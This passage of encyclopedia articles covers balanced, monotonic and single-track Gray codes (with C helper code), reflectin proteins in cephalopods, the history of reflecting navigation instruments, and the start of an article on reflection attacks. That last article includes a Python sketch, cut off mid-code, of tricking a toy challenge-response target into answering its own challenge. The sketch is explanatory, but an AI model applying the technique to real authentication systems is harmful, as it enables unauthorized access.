whereas a balanced 5-bit Gray code has a total of 32 transitions, which cannot be evenly distributed among the positions. In this example, four positions have six transitions each, and one has eight: [ 52 ]
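A small helper of this kind (the function and variable names are purely illustrative) makes transition counts easy to verify for a concrete code; applied to the standard 4-bit BRGC it shows how unbalanced that code is, which is exactly the motivation for balanced codes:

#include <stdio.h>

/* Count how many transitions of a cyclic Gray sequence occur at each bit position. */
static void transition_spectrum(const unsigned *codes, unsigned len,
                                unsigned bits, unsigned *counts)
{
    for (unsigned b = 0; b < bits; b++)
        counts[b] = 0;
    for (unsigned i = 0; i < len; i++) {
        unsigned diff = codes[i] ^ codes[(i + 1) % len];   /* cyclic neighbour */
        for (unsigned b = 0; b < bits; b++)
            if (diff & (1u << b))
                counts[b]++;
    }
}

int main(void)
{
    /* The standard 4-bit binary-reflected Gray code. */
    unsigned brgc[16];
    for (unsigned i = 0; i < 16; i++)
        brgc[i] = i ^ (i >> 1);

    unsigned counts[4];
    transition_spectrum(brgc, 16, 4, counts);
    for (unsigned b = 0; b < 4; b++)
        printf("bit %u: %u transitions\n", b, counts[b]);
    /* For the BRGC this prints 8, 4, 2, 2 transitions for bits 0..3. */
    return 0;
}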
We will now show a construction [ 66 ] and implementation [ 67 ] for well-balanced binary Gray codes which allows us to generate an n -digit balanced Gray code for every n . The main principle is to inductively construct an ( n + 2)-digit Gray code $G'$ given an n -digit Gray code G in such a way that the balanced property is preserved. To do this, we consider partitions of $G = g_0, \ldots, g_{2^n - 1}$ into an even number L of non-empty blocks of the form
$$\{g_0\},\ \{g_1, \ldots, g_{k_2}\},\ \{g_{k_2+1}, \ldots, g_{k_3}\},\ \ldots,\ \{g_{k_{L-2}+1}, \ldots, g_{-2}\},\ \{g_{-1}\},$$
where $k_1 = 0$, $k_{L-1} = -2$, and $k_L \equiv -1 \pmod{2^n}$ (the negative indices are taken modulo $2^n$). This partition induces an ( n + 2)-digit Gray code. If we define the transition multiplicities
$$m_i = \left|\left\{ j : \delta_{k_j} = i,\ 1 \le j \le L \right\}\right|$$
to be the number of times the digit in position i changes between consecutive blocks in a partition, then for the ( n + 2)-digit Gray code induced by this partition the transition spectrum $\lambda'_i$ is
$$\lambda'_i = \begin{cases} 4\lambda_i - 2m_i, & \text{if } 0 \le i < n \\ L, & \text{otherwise.} \end{cases}$$
The delicate part of this construction is to find an adequate partitioning of a balanced n -digit Gray code such that the code induced by it remains balanced, but for this only the transition multiplicities matter; joining two consecutive blocks over a digit $i$ transition and splitting another block at another digit $i$ transition produces a different Gray code with exactly the same transition spectrum $\lambda'_i$, so one may for example [ 65 ] designate the first $m_i$ transitions at digit $i$ as those that fall between two blocks. Uniform codes can be found when $R \equiv 0 \pmod 4$ and $R^n \equiv 0 \pmod n$, and this construction can be extended to the R -ary case as well. [ 66 ]
Long run (or maximum gap ) Gray codes maximize the distance between consecutive changes of digits in the same position. That is, the minimum run-length of any bit remains unchanged for as long as possible. [ 68 ]
Monotonic codes are useful in the theory of interconnection networks, especially for minimizing dilation for linear arrays of processors. [ 69 ] If we define the weight of a binary string to be the number of 1s in the string, then although we clearly cannot have a Gray code with strictly increasing weight, we may want to approximate this by having the code run through two adjacent weights before reaching the next one.
We can formalize the concept of monotone Gray codes as follows: consider the partition of the hypercube $Q_n = (V_n, E_n)$ into levels of vertices that have equal weight, i.e.
$$V_n(i) = \{ v \in V_n : v \text{ has weight } i \}$$
for $0 \le i \le n$. These levels satisfy $|V_n(i)| = \binom{n}{i}$. Let $Q_n(i)$ be the subgraph of $Q_n$ induced by $V_n(i) \cup V_n(i+1)$, and let $E_n(i)$ be the edges in $Q_n(i)$. A monotonic Gray code is then a Hamiltonian path in $Q_n$ such that whenever $\delta_1 \in E_n(i)$ comes before $\delta_2 \in E_n(j)$ in the path, then $i \le j$.
An elegant construction of monotonic n -digit Gray codes for any n is based on the idea of recursively building subpaths $P_{n,j}$ of length $2\binom{n}{j}$ having edges in $E_n(j)$. [ 69 ] We define $P_{1,0} = (0, 1)$, $P_{n,j} = \emptyset$ whenever $j < 0$ or $j \ge n$, and
$$P_{n+1,j} = 1P_{n,j-1}^{\pi_n},\ 0P_{n,j}$$
otherwise. Here, $\pi_n$ is a suitably defined permutation and $P^{\pi}$ refers to the path P with its coordinates permuted by $\pi$. These paths give rise to two monotonic n -digit Gray codes $G_n^{(1)}$ and $G_n^{(2)}$ given by
$$G_n^{(1)} = P_{n,0} P_{n,1}^R P_{n,2} P_{n,3}^R \cdots \quad \text{and} \quad G_n^{(2)} = P_{n,0}^R P_{n,1} P_{n,2}^R P_{n,3} \cdots$$
The choice of $\pi_n$ which ensures that these codes are indeed Gray codes turns out to be $\pi_n = E^{-1}\left(\pi_{n-1}^2\right)$. The first few values of $P_{n,j}$ are shown in the table below.
These monotonic Gray codes can be efficiently implemented in such a way that each subsequent element can be generated in O ( n ) time. The algorithm is most easily described using coroutines .
Monotonic codes have an interesting connection to the Lovász conjecture , which states that every connected vertex-transitive graph contains a Hamiltonian path. The "middle-level" subgraph $Q_{2n+1}(n)$ is vertex-transitive (that is, its automorphism group is transitive, so that each vertex has the same "local environment" and cannot be differentiated from the others, since we can relabel the coordinates as well as the binary digits to obtain an automorphism ) and the problem of finding a Hamiltonian path in this subgraph is called the "middle-levels problem", which can provide insights into the more general conjecture. The question has been answered affirmatively for $n \le 15$, and the preceding construction for monotonic codes ensures a Hamiltonian path of length at least 0.839 N , where N is the number of vertices in the middle-level subgraph. [ 70 ]
Another type of Gray code, the Beckett–Gray code , is named for Irish playwright Samuel Beckett , who was interested in symmetry . His play " Quad " features four actors and is divided into sixteen time periods. Each period ends with one of the four actors entering or leaving the stage. The play begins and ends with an empty stage, and Beckett wanted each subset of actors to appear on stage exactly once. [ 71 ] Clearly the set of actors currently on stage can be represented by a 4-bit binary Gray code. Beckett, however, placed an additional restriction on the script: he wished the actors to enter and exit so that the actor who had been on stage the longest would always be the one to exit. The actors could then be represented by a first in, first out queue , so that (of the actors onstage) the actor being dequeued is always the one who was enqueued first. [ 71 ] Beckett was unable to find a Beckett–Gray code for his play, and indeed, an exhaustive listing of all possible sequences reveals that no such code exists for n = 4. It is known today that such codes do exist for n = 2, 5, 6, 7, and 8, and do not exist for n = 3 or 4. An example of an 8-bit Beckett–Gray code can be found in Donald Knuth 's Art of Computer Programming . [ 13 ] According to Sawada and Wong, the search space for n = 6 can be explored in 15 hours, and more than 9500 solutions for the case n = 7 have been found. [ 72 ]
Snake-in-the-box codes, or snakes , are the sequences of nodes of induced paths in an n -dimensional hypercube graph , and coil-in-the-box codes, [ 73 ] or coils , are the sequences of nodes of induced cycles in a hypercube. Viewed as Gray codes, these sequences have the property of being able to detect any single-bit coding error. Codes of this type were first described by William H. Kautz in the late 1950s; [ 5 ] since then, there has been much research on finding the code with the largest possible number of codewords for a given hypercube dimension.
Yet another kind of Gray code is the single-track Gray code (STGC) developed by Norman B. Spedding [ 74 ] [ 75 ] and refined by Hiltgen, Paterson and Brandestini in Single-track Gray Codes (1996). [ 76 ] [ 77 ] The STGC is a cyclical list of P unique binary encodings of length n such that two consecutive words differ in exactly one position, and when the list is examined as a P × n matrix , each column is a cyclic shift of the first column. [ 78 ]
The name comes from their use with rotary encoders , where a number of tracks are being sensed by contacts, resulting for each in an output of 0 or 1 . To reduce noise due to different contacts not switching at exactly the same moment in time, one preferably sets up the tracks so that the data output by the contacts are in Gray code. To get high angular accuracy, one needs lots of contacts; in order to achieve at least 1° accuracy, one needs at least 360 distinct positions per revolution, which requires a minimum of 9 bits of data, and thus the same number of contacts.
If all contacts are placed at the same angular position, then 9 tracks are needed to get a standard BRGC with at least 1° accuracy. However, if the manufacturer moves a contact to a different angular position (but at the same distance from the center shaft), then the corresponding "ring pattern" needs to be rotated the same angle to give the same output. If the most significant bit (the inner ring in Figure 1) is rotated enough, it exactly matches the next ring out. Since both rings are then identical, the inner ring can be cut out, and the sensor for that ring moved to the remaining, identical ring (but offset at that angle from the other sensor on that ring). Those two sensors on a single ring make a quadrature encoder. That reduces the number of tracks for a "1° resolution" angular encoder to 8 tracks. Reducing the number of tracks still further cannot be done with BRGC.
For many years, Torsten Sillke [ 79 ] and other mathematicians believed that it was impossible to encode position on a single track such that consecutive positions differed at only a single sensor, except for the 2-sensor, 1-track quadrature encoder. So for applications where 8 tracks were too bulky, people used single-track incremental encoders (quadrature encoders) or 2-track "quadrature encoder + reference notch" encoders.
Norman B. Spedding, however, registered a patent in 1994 with several examples showing that it was possible. [ 74 ] Although it is not possible to distinguish $2^n$ positions with n sensors on a single track, it is possible to distinguish close to that many. Etzion and Paterson conjecture that when n is itself a power of 2, n sensors can distinguish at most $2^n - 2n$ positions and that for prime n the limit is $2^n - 2$ positions. [ 80 ] The authors went on to generate a 504-position single track code of length 9 which they believe is optimal. Since this number is larger than $2^8 = 256$, more than 8 sensors are required by any code, although a BRGC could distinguish 512 positions with 9 sensors.
An STGC for P = 30 and n = 5 is reproduced here:
Each column is a cyclic shift of the first column, and from any row to the next row only one bit changes. [ 81 ] The single-track nature (like a code chain) is useful in the fabrication of these wheels (compared to BRGC), as only one track is needed, thus reducing their cost and size.
The Gray code nature is useful (compared to chain codes , also called De Bruijn sequences ), as only one sensor will change at any one time, so the uncertainty during a transition between two discrete states will only be plus or minus one unit of angular measurement the device is capable of resolving. [ 82 ]
Since this 30 degree example was added, there has been a lot of interest in examples with higher angular resolution. In 2008, Gary Williams, [ 83 ] [ user-generated source? ] based on previous work, [ 80 ] discovered a 9-bit single track Gray code that gives a 1 degree resolution. This Gray code was used to design an actual device which was published on the site Thingiverse . This device [ 84 ] was designed by etzenseep (Florian Bauer) in September 2022.
An STGC for P = 360 and n = 9 is reproduced here:
Two-dimensional Gray codes are used in communication to minimize the number of bit errors in quadrature amplitude modulation (QAM) adjacent points in the constellation . In a typical encoding the horizontal and vertical adjacent constellation points differ by a single bit, and diagonal adjacent points differ by 2 bits. [ 85 ]
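A minimal sketch of such a mapping for 16-QAM follows; the amplitude levels and the split of the four bits between the axes are one conventional choice used for illustration, not a mandated standard.

#include <stdio.h>

/* Map a 4-bit symbol onto a 16-QAM constellation using a 2-bit Gray code per
   axis, so that horizontally and vertically adjacent points differ in exactly
   one bit. Amplitude levels are the common {-3, -1, +1, +3} set. */
static const int levels[4] = { -3, -1, 1, 3 };
static const unsigned gray2[4] = { 0, 1, 3, 2 };   /* 2-bit Gray sequence */

static void map_16qam(unsigned symbol, int *i_out, int *q_out)
{
    unsigned hi = (symbol >> 2) & 3;   /* two bits for the I axis */
    unsigned lo = symbol & 3;          /* two bits for the Q axis */

    /* Find the constellation column/row whose Gray label matches the bits. */
    for (int k = 0; k < 4; k++) {
        if (gray2[k] == hi) *i_out = levels[k];
        if (gray2[k] == lo) *q_out = levels[k];
    }
}

int main(void)
{
    int i, q;
    for (unsigned s = 0; s < 16; s++) {
        map_16qam(s, &i, &q);
        printf("symbol %2u -> I=%+d Q=%+d\n", s, i, q);
    }
    return 0;
}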
Two-dimensional Gray codes also have uses in location identification schemes, where the code is applied to area maps such as a Mercator projection of the earth's surface and an appropriate cyclic two-dimensional distance function, such as the Mannheim metric , is used to calculate the distance between two encoded locations, thereby combining the characteristics of the Hamming distance with the cyclic continuation of a Mercator projection. [ 86 ]
If a subsection of a specific code value is extracted from that value, for example the last 3 bits of a 4-bit Gray code, the resulting code will be an "excess Gray code". This code shows the property of counting backwards in those extracted bits if the original value is increased further. The reason is that Gray-encoded values do not overflow in the way familiar from classic binary encoding when counting past the "highest" value.
Example: The highest 3-bit Gray code, 7, is encoded as (0)100. Adding 1 results in number 8, encoded in Gray as 1100. The last 3 bits do not overflow and count backwards if you further increase the original 4 bit code.
When working with sensors that output multiple, Gray-encoded values in a serial fashion, one should therefore pay attention whether the sensor produces those multiple values encoded in 1 single Gray code or as separate ones, as otherwise the values might appear to be counting backwards when an "overflow" is expected.
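A short demonstration of this backwards counting, using the usual n ⊕ ⌊n/2⌋ encoding:

#include <stdio.h>

int main(void)
{
    /* Show the lower 3 bits of successive 4-bit Gray codes: they count
       forward for values 0-7 and then backwards for values 8-15. */
    for (unsigned v = 0; v < 16; v++) {
        unsigned gray = v ^ (v >> 1);
        printf("value %2u  gray %u%u%u%u  low 3 bits %u\n",
               v,
               (gray >> 3) & 1, (gray >> 2) & 1, (gray >> 1) & 1, gray & 1,
               gray & 7);
    }
    return 0;
}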
The bijective mapping { 0 ↔ 00 , 1 ↔ 01 , 2 ↔ 11 , 3 ↔ 10 } establishes an isometry between the metric space over the finite field $\mathbb{Z}_2^2$ with the metric given by the Hamming distance and the metric space over the finite ring $\mathbb{Z}_4$ (the usual modular arithmetic ) with the metric given by the Lee distance . The mapping is suitably extended to an isometry of the Hamming spaces $\mathbb{Z}_2^{2m}$ and $\mathbb{Z}_4^m$. Its importance lies in establishing a correspondence between various "good" but not necessarily linear codes as Gray-map images in $\mathbb{Z}_2^2$ of ring-linear codes from $\mathbb{Z}_4$. [ 87 ] [ 88 ]
There are a number of binary codes similar to Gray codes, including:
The following binary-coded decimal (BCD) codes are Gray code variants as well: | https://en.wikipedia.org/wiki/Reflected_binary_code |
Reflectins are a family of intrinsically disordered proteins evolved by a number of cephalopods, including Euprymna scolopes and Doryteuthis opalescens , to produce iridescent camouflage and signaling. The recently identified protein family is enriched in aromatic and sulfur -containing amino acids , and is utilized by certain cephalopods to refract incident light in their environment. [ 1 ] The reflectin protein is responsible for dynamic pigmentation and iridescence in these organisms. This process is "dynamic" because it is reversible, allowing reflectin to change an organism's appearance in response to external factors such as the need to camouflage or to send warning signals.
Reflectin proteins are likely distributed in the outer layer of cells called "sheath cells" that surround an organism's pigment cells, also known as chromatocytes. [ 2 ] Specific sequences of reflectin enable cephalopods to communicate and camouflage by adjusting color and reflectivity. [ 3 ]
Reflectin is presumed to have originated from a type of transposon (nicknamed a jumping gene ), which is a DNA sequence that can change position within genetic material by encoding an enzyme . The encoded enzyme detaches the transposon from one location in a genome and ligates (binds) it to another. "Jumps" of a transposon can create or reverse mutations that alter a cell's genetic identity, which can result in new characteristics. This process can be thought of as a "cut and paste" mechanism. Transposons' ability to adapt within a genome and quickly shift its identity is a property that closely resembles the behavior of reflectin.
An additional proposed ancestor is the symbiotic Vibrio fischeri (also called Aliivibrio fischeri), a bioluminescent (light-producing and light-emitting) bacterium often found in symbiotic relationships. As reflectin and Vibrio fischeri share similar functions, such as producing an iridescent appearance in organisms, it is also thought that, just like Vibrio fischeri, reflectin is symbiotic and is used by cephalopods to interact with their environment. [ 4 ] [ 5 ]
Reflectin is a disordered protein made up of conserved amino acid sequences. Each sequence includes a combination of standard and sulfur-containing amino acids. Although the basic structure can be deduced, the exact molecular structure is yet to be determined. The light-interacting properties of reflectin can be attributed to its ordered hierarchical structure and hydrogen bonding . [ 6 ] [ 7 ] [ 8 ]
Reflectins make up the majority of Bragg reflectors , which are formed by invaginations of the cell membrane. Bragg reflectors are responsible for reflecting color in a type of skin cell called an iridocyte . The reflectors are composed of periodically stacked lamellae, thin layers of tissue bound to a membrane. The color and brightness of light reflected by many species is determined by the thickness, spacing, and refractive index (how fast light can travel through the membrane) of the Bragg lamellae. [ 9 ] A change in membrane thickness triggers an outflow of water from the Bragg lamellae, essentially dehydrating them, increasing their refractive index and decreasing their thickness and spacing. This results in an increase in reflectance from the Bragg lamellae and a change in color of the reflected light. This change additionally allows initially transparent cells to increase in brightness. [ 8 ]
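As a rough numerical illustration of how lamella thickness and refractive index set the reflected colour, the first-order constructive-interference condition for a two-material stack at normal incidence can be evaluated. The refractive indices and thicknesses below are assumed example values, not measured reflectin-platelet data.

#include <stdio.h>

int main(void)
{
    /* Illustrative first-order Bragg condition for a two-material multilayer
       at normal incidence: lambda = 2 * (n_a*d_a + n_b*d_b). */
    double n_platelet = 1.59, d_platelet = 100e-9;   /* high-index lamella (assumed) */
    double n_spacer   = 1.33, d_spacer   = 120e-9;   /* low-index spacing (assumed) */

    double lambda = 2.0 * (n_platelet * d_platelet + n_spacer * d_spacer);
    printf("Peak reflected wavelength: %.0f nm\n", lambda * 1e9);

    /* Thinner, dehydrated lamellae shift the reflected colour toward shorter
       wavelengths, as described above. */
    d_platelet *= 0.8;
    d_spacer   *= 0.8;
    lambda = 2.0 * (n_platelet * d_platelet + n_spacer * d_spacer);
    printf("After thinning:            %.0f nm\n", lambda * 1e9);
    return 0;
}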
Reflectin is able to receive information from signals in a continuous process that fine-tunes the osmotic pressure of sub-cellular structures of cephalopods. This ongoing process is used to regulate photonic behavior, or in other words, to control how an organism changes color. The components of reflectin carry a very strong positive charge. Nerve signals are sent to iridophore cells (also called chromatophores), which are pigment-containing cells that add a negative charge to reflectin. With the charges balanced, the protein folds up to expose a sticky surface, causing reflectin molecules to clump together. This process repeats until enough reflectin proteins have accumulated to change the fluid pressure of the membrane of the cell walls. The thickness of the membrane is reduced as water escapes, a process that changes the wavelength of light reflected. [ 2 ] By adapting an organism's membrane to reflect different wavelengths, reflectin allows cephalopods to shift between different shades of red, yellow, green, and blue, as well as adjust the brightness of the projected color. [ 10 ] [ 11 ] [ 12 ] [ 13 ]
Reflectins have been heterologously expressed in mammalian cells to change their refractive index . [ 17 ] | https://en.wikipedia.org/wiki/Reflectin |
Reflecting instruments are those that use mirrors to enhance their ability to make measurements. In particular, the use of mirrors permits one to observe two objects simultaneously while measuring the angular distance between the objects. While reflecting instruments are used in many professions, they are primarily associated with celestial navigation as the need to solve navigation problems, in particular the problem of the longitude , was the primary motivation in their development.
The purpose of reflecting instruments is to allow an observer to measure the altitude of a celestial object or the angular distance between two objects. The driving force behind the developments discussed here was the solution to the problem of finding one's longitude at sea. The solution to this problem was seen to require an accurate means of measuring angles and the accuracy was seen to rely on the observer's ability to measure this angle by simultaneously observing two objects.
The deficiency of prior instruments was well known. Requiring the observer to observe two objects with two divergent lines of sight increased the likelihood of an error. Those that considered the problem realized that the use of specula (mirrors in modern parlance) could permit two objects to be observed in a single view. What followed is a series of inventions and improvements that refined the instrument to the point that its accuracy exceeded that which was required for determining longitude. Any further improvements required a completely new technology.
Some of the early reflecting instruments were proposed by scientists such as Robert Hooke and Isaac Newton . These were little used or may not have been built or tested extensively. The van Breen instrument was the exception, in that it was used by the Dutch. However, it had little influence outside of the Netherlands .
Invented in 1660 by the Dutch Joost van Breen, the spiegelboog (mirror-bow) was a reflecting cross staff . This instrument appears to have been used for approximately 100 years, mainly in the Zeeland Chamber of the VOC (The Dutch East India Company ). [ 1 ]
Hooke's instrument was a single-reflecting instrument. It used a single mirror to reflect the image of an astronomical object to the observer's eye. [ 2 ] This instrument was first described in 1666 and a working model was presented by Hooke at a meeting of the Royal Society some time later.
The device consisted of three primary components, an index arm, a radial arm and a graduated chord. The three were arranged in a triangle as in the image on the right. A telescopic sight was mounted on the index arm. At the point of rotation of the radial arm, a single mirror was mounted. This point of rotation allowed the angle between the index arm and the radial arm to be changed. The graduated chord was connected to the opposite end of the radial arm and the chord was permitted to rotate about the end. The chord was held against the distant end of the index arm and slid against it. The graduations on the chord were uniform and, by using it to measure the distance between the ends of the index arm and the radial arm, the angle between those arms could be determined. A table of chords was used to convert a measurement of distance to a measurement of angle. The use of the mirror resulted in the measured angle being twice the angle included by the index and the radius arm.
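As a rough sketch of that chord-to-angle conversion (unit-length arms are assumed for simplicity, and the numbers are only an example, not dimensions of Hooke's actual instrument):

#include <stdio.h>
#include <math.h>

int main(void)
{
    const double PI = 3.14159265358979323846;

    /* For arms of unit length, a chord c subtends an angle of 2*asin(c/2)
       between them; the mirror doubles the measured angle. */
    double chord = 0.52;                         /* example chord reading */
    double arm_angle = 2.0 * asin(chord / 2.0);  /* angle between the arms, radians */
    double measured  = 2.0 * arm_angle;          /* observed angular distance */

    printf("Angle between arms: %.2f degrees\n", arm_angle * 180.0 / PI);
    printf("Measured angle:     %.2f degrees\n", measured  * 180.0 / PI);
    return 0;
}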
The mirror on the radial arm was small enough that the observer could see the reflection of an object in half the telescope's view while seeing straight ahead in the other half. This allowed the observer to see both objects at once. Aligning the two objects in the telescope's view caused the angular distance between them to be represented on the graduated chord.
While Hooke's instrument was novel and attracted some attention at the time, there is no evidence that it was subjected to any tests at sea. [ 2 ] The instrument was little used and did not have any significant effect on astronomy or navigation.
In 1692, Edmond Halley presented the design of a reflecting instrument to the Royal Society. [ 2 ]
This is an interesting instrument, combining the functionality of a radio latino with a double telescope . The telescope (AB in the adjacent image) has an eyepiece at one end and a mirror (D) partway along its length, with one objective lens at the far end (B). The mirror only obstructs half the field (either left or right) and permits the objective to be seen on the other. Reflected in the mirror is the image from the second objective lens (C). This permits the observer to see both images, one straight through and one reflected, simultaneously beside each other. It is essential that the focal lengths of the two objective lenses be the same and that the distances from the mirror to either lens be identical. If this condition is not met, the two images cannot be brought to a common focus .
The mirror is mounted on the staff (DF) of the radio latino portion of the instrument and rotates with it. The angle this side of the radio latino's rhombus makes to the telescope can be set by adjusting the rhombus' diagonal length. In order to facilitate this and allow for fine adjustment of the angle, a screw (EC) is mounted so as to allow the observer to change the distance between the two vertexes (E and C).
The observer sights the horizon with the direct lens' view and sights a celestial object in the mirror. Turning the screw to bring the two images directly adjacent sets the instrument. The angle is determined by taking the length of the screw between E and C and converting this to an angle in a table of chords .
Halley specified that the telescope tube be rectangular in cross section. This makes construction easy, but is not a requirement as other cross section shapes can be accommodated. The four sides of the radio latino portion (CD, DE, EF, FC) must be equal in length in order for the angle between the telescope and the objective lens side (ADC) to be precisely twice the angle between the telescope and the mirror (ADF) (or in other words – to enforce the angle of incidence being equal to the angle of reflection ). Otherwise, instrument collimation will be compromised and the resulting measurements would be in error.
The celestial object's elevation angle could have been determined by reading from graduations on the staff at the slider; however, that is not how Halley designed the instrument. This may suggest that the overall design of the instrument was coincidentally like a radio latino and that Halley may not have been familiar with that instrument.
It is not known whether this instrument was ever tested at sea. [ 2 ]
Newton's reflecting quadrant was similar in many respects to Hadley's first reflecting quadrant that followed it.
Newton had communicated the design to Edmond Halley around 1699. However, Halley did not do anything with the document, and it remained in his papers only to be discovered after his death. [ 3 ] Halley did, however, discuss Newton's design with members of the Royal Society when Hadley presented his reflecting quadrant in 1731. Halley noted that Hadley's design was quite similar to the earlier Newtonian instrument. [ 2 ]
As a result of this inadvertent secrecy, Newton's invention played little role in the development of reflecting instruments.
What is remarkable about the octant is the number of persons who independently invented the device in a short period of time. John Hadley and Thomas Godfrey both get credit for inventing the octant . They independently developed the same instrument around 1731. They were not the only ones, however.
In Hadley's case, two instruments were designed. The first was an instrument very similar to Newton's reflecting quadrant. The second had essentially the same form as the modern sextant. Few of the first design were constructed, while the second became the standard instrument from which the sextant derived and, along with the sextant, displaced all prior navigation instruments used for celestial navigation .
Caleb Smith, an English insurance broker with a strong interest in astronomy, had created an octant in 1734. He called it an Astroscope or Sea-Quadrant . [ 4 ] He used a fixed prism in addition to an index mirror to provide reflective elements. Prisms provide advantages over mirrors in an era when polished speculum metal mirrors were inferior and both the silvering of a mirror and the production of glass with flat, parallel surfaces was difficult. However, the other design elements of Smith's instrument made it inferior to Hadley's octant and it was not used significantly. [ 3 ]
Jean-Paul Fouchy, a mathematics professor and astronomer in France , invented an octant in 1732. [ 3 ] His was essentially the same as Hadley's. Fouchy did not know of the developments in England at the time, since communication between the two countries' instrument makers was limited and the publications of the Royal Society , particularly the Philosophical Transactions , were not being distributed in France. [ 5 ] Fouchy's octant was overshadowed by Hadley's.
The origin of the sextant is straightforward and not in dispute. Admiral John Campbell , having used Hadley's octant in sea trials of the method of lunar distances , found that it was wanting. The 90° angle subtended by the arc of the instrument was insufficient to measure some of the angular distances required for the method. He suggested that the angle be increased to 120°, yielding the sextant. John Bird made the first such sextant in 1757. [ 6 ]
With the development of the sextant, the octant became something of a second class instrument. The octant, while occasionally constructed entirely of brass, remained primarily a wooden-framed instrument. Most of the developments in advanced materials and construction techniques were reserved for the sextant.
There are examples of sextants made of wood; however, most are made of brass. In order to ensure the frame was stiff, instrument makers used thicker frames. This had a drawback in making the instrument heavier, which could influence the accuracy due to hand-shaking as the navigator worked against its weight. In order to avoid this problem, the frames were modified. Edward Troughton patented the double-framed sextant in 1788. [ 7 ] This used two frames held in parallel with spacers. The two frames were about a centimetre apart. This significantly increased the stiffness of the frame. An earlier version had a second frame that only covered the upper part of the instrument, securing the mirrors and telescope. Later versions used two full frames. Since the spacers looked like little pillars, these were also called pillar sextants .
Troughton also experimented with alternative materials. The scales were plated with silver , gold or platinum . Gold and platinum both minimized corrosion problems. The platinum-plated instruments were expensive, due to the scarcity of the metal, though less expensive than gold. Troughton knew William Hyde Wollaston through the Royal Society and this gave him access to the precious metal. [ 8 ] Instruments from Troughton's company that used platinum can be easily identified by the word Platina engraved on the frame. These instruments remain highly valued as collector's items and are as accurate today as when they were constructed. [ 9 ]
As developments in dividing engines progressed, the sextant became more accurate and could be made smaller. In order to permit easy reading of the vernier , a small magnifying lens was added. In addition, to reduce glare on the frame, some had a diffuser surrounding the magnifier to soften the light. As accuracy increased, the circular arc vernier was replaced with a drum vernier.
Frame designs were modified over time to create a frame that would not be adversely affected by temperature changes. These frame patterns became standardized and one can see the same general shape in many instruments from many different manufacturers.
In order to control costs, modern sextants are now available in precision-made plastic. These are light, affordable and of high quality.
While most people think of navigation when they hear the term sextant , the instrument has been used in other professions.
In addition to these types, there are terms used for various sextants.
A pillar sextant can be either:
The former is the most common use of the term.
Several makers offered instruments with sizes other than one-eighth or one-sixth of a circle. One of the most common was the quintant or fifth of a circle (72° arc reading to 144°). Other sizes were also available, but the odd sizes never became common. Many instruments are found with scales reading to, for example, 135°, but they are simply referred to as sextants. Similarly, there are 100° octants, but these are not separated as unique types of instruments.
There was interest in much larger instruments for special purposes. In particular a number of full circle instruments were made, categorized as reflecting circles and repeating circles .
The reflecting circle was invented by the German geometer and astronomer Tobias Mayer in 1752, [ 6 ] with details published in 1767. [ 3 ] His development preceded the sextant and was motivated by the need to create a superior surveying instrument. [ 3 ]
The reflecting circle is a complete circular instrument graduated to 720° (to measure distances between heavenly bodies, there is no need to read an angle greater than 180°, since the minimum distance will always be less than 180°). Mayer presented a detailed description of this instrument to the Board of Longitude and John Bird used the information to construct one sixteen inches in diameter for evaluation by the Royal Navy. [ 11 ] This instrument was one of those used by Admiral John Campbell during his evaluation of the lunar distance method . It differed in that it was graduated to 360° and was so heavy that it was fitted with a support that attached to a belt. [ 11 ] It was not considered better than the Hadley octant and was less convenient to use. [ 3 ] As a result, Campbell recommended the construction of the sextant.
Jean-Charles de Borda further developed the reflecting circle. He modified the position of the telescopic sight in such a way that the mirror could be used to receive an image from either side relative to the telescope. This eliminated the need to ascertain that the mirrors were precisely parallel when reading zero. This simplified the use of the instrument. Further refinements were performed with the help of Etienne Lenoir . The two of them refined the instrument to its definitive form in 1777. [ 3 ] This instrument was so distinctive it was given the name Borda circle or repeating circle . [ 6 ] [ 12 ] Borda and Lenoir developed the instrument for geodetic surveying . Since it was not used for the celestial measures, it did not use double reflection and substituted two telescope sights. As such, it was not a reflecting instrument. It was notable as being the equal of the great theodolite created by the renowned instrument maker, Jesse Ramsden .
Josef de Mendoza y Ríos redesigned Borda's reflecting circle (London, 1801). The goal was to use it together with his Lunar Tables published by the Royal Society (London, 1805). He made a design with two concentric circles and a vernier scale and recommended averaging three sequential readings to reduce the error. Borda's system was not based on a circle of 360° but on one of 400 grads (Borda spent years calculating his tables with a circle divided into 400 grads). Mendoza's lunar tables were used through almost the entire nineteenth century (see Lunar distance (navigation) ).
Edward Troughton also modified the reflecting circle. He created a design with three index arms and verniers . This permitted three simultaneous readings to average out the error.
As a navigation instrument, the reflecting circle was more popular with the French navy than with the British. [ 6 ]
The Bris sextant is not a true sextant, but it is a true reflecting instrument based on the principle of double reflection and subject to the same rules and errors as common octants and sextants. Unlike common octants and sextants, which can measure any angle within the range of the instrument, the Bris sextant is a fixed-angle instrument capable of accurately measuring only a few specific angles. It is particularly suited to determining the altitude of the sun or moon .
Francis Ronalds invented an instrument for recording angles in 1829 by modifying the octant. A disadvantage of reflecting instruments in surveying applications is that optics dictate that the mirror and index arm rotate through half the angular separation of the two objects. The angle thus needs to be read, noted and a protractor employed to draw the angle on a plan. Ronalds' idea was to configure the index arm to rotate through twice the angle of the mirror, so that the arm could then be used to draw a line at the correct angle directly onto the drawing. He used a sector as the basis of his instrument and placed the horizon glass at one tip and the index mirror near the hinge connecting the two rulers. The two revolving elements were linked mechanically and the barrel supporting the mirror was twice the diameter of the hinge to give the required angular ratio. [ 13 ] | https://en.wikipedia.org/wiki/Reflecting_instrument |
In computer security , a reflection attack is a method of attacking a challenge–response authentication system that uses the same protocol in both directions. That is, the same challenge–response protocol is used by each side to authenticate the other side. The essential idea of the attack is to trick the target into providing the answer to its own challenge. [ 1 ]
The general attack outline is as follows:
If the authentication protocol is not carefully designed, the target will accept that response as valid, thereby leaving the attacker with one fully authenticated channel connection (the other one is simply abandoned).
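The following is a minimal sketch, not taken from any particular protocol, of how such a reflection succeeds against a naive scheme in which both directions authenticate with the same shared-key MAC; the class, function and challenge formats are illustrative assumptions rather than details from the article.

```python
import hmac, hashlib, os

KEY = os.urandom(16)  # shared secret held by the honest target (attacker never sees it)

def mac_response(challenge: bytes) -> bytes:
    # Honest party's answer: a MAC of the challenge under the shared key.
    return hmac.new(KEY, challenge, hashlib.sha256).digest()

class Target:
    """Honest peer that both issues challenges and answers them with the same protocol."""
    def new_challenge(self) -> bytes:
        self.challenge = os.urandom(16)
        return self.challenge
    def answer(self, challenge: bytes) -> bytes:
        return mac_response(challenge)            # answers any challenge it receives
    def verify(self, answer: bytes) -> bool:
        return hmac.compare_digest(answer, mac_response(self.challenge))

target = Target()

# Connection 1: the attacker (who has no key) asks to authenticate and receives a challenge.
c = target.new_challenge()

# Connection 2: the attacker opens a second session and sends the target its own
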